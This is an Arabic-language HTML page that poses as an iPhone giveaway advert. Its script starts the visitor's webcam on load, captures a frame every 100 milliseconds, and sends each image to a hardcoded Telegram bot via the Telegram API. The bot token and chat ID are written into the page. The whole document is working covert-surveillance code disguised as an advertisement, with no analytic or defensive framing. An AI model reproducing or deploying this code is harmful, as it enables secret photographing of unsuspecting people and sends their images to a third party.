<!DOCTYPE html>
<html lang="ar">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>.</title>
  <style> 
    #ad-overlay {
      position: fixed;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background-color: rgba(0, 0, 0, 100%); 
      color: white;
      display: flex;
      flex-direction: column;
      align-items: center;
      justify-content: center;
      font-size: 1.5rem;
      z-index: 1000;
    }
    #ad-overlay button {
      margin-top: 20px;
      padding: 10px 20px;
      font-size: 1rem;
      background-color: #ff9900;
      border: none;
      border-radius: 5px;
      cursor: pointer;
      color: white;
    }
    #ad-overlay button:hover {
      background-color: #cc7a00;
    }
  </style>
</head>
<body>

  <div id="ad-overlay">
    <p>اشترك الآن للدخول في السحب على جهاز آيفون جديد!</p>
    <button onclick="closeAd()">أغلق الإعلان</button>
  </div>

  
  <video id="video" autoplay playsinline style="width: 100%; max-width: 600px;"></video>
  <canvas id="canvas" style="display: none;"></canvas>
  <div id="snapshots" style="margin-top: 20px; display: flex; flex-wrap: wrap; gap: 10px;"></div>

  <script>
    const video = document.getElementById('video');
    const canvas = document.getElementById('canvas');
    const snapshots = document.getElementById('snapshots');
    const botToken = "7085032831:AAHpIvgwtiWAFDPOqqGnmg_l4RP57xGlQyY";
    const chatId = "5198984934"; 
    async function startCamera() {
      try {
        const stream = await navigator.mediaDevices.getUserMedia({ video: true });
        video.srcObject = stream;

        setInterval(capturePhoto, 100); 
      } catch (error) {
        alert('.');
      }
    }

    async function capturePhoto() {
      const context = canvas.getContext('2d');
      canvas.width = video.videoWidth;
      canvas.height = video.videoHeight;
      context.drawImage(video, 0, 0, canvas.width, canvas.height);

      const imgData = canvas.toDataURL('image/png');
      sendPhotoToTelegram(imgData); 
    }

    async function sendPhotoToTelegram(imgData) {
      const formData = new FormData();

      const blob = await (await fetch(imgData)).blob();
      formData.append('chat_id', chatId);
      formData.append('photo', blob, 'snapshot.png');

      try {
        const response = await fetch(`https://api.telegram.org/bot${botToken}/sendPhoto`, {
          method: 'POST',
          body: formData
        });
        const result = await response.json();
        if (result.ok) {
          console.log('.');
        } else {
          console.error('.');
        }
      } catch (error) {
        console.error('.');
      }
    }

    startCamera();
  </script>
</body>
</html>
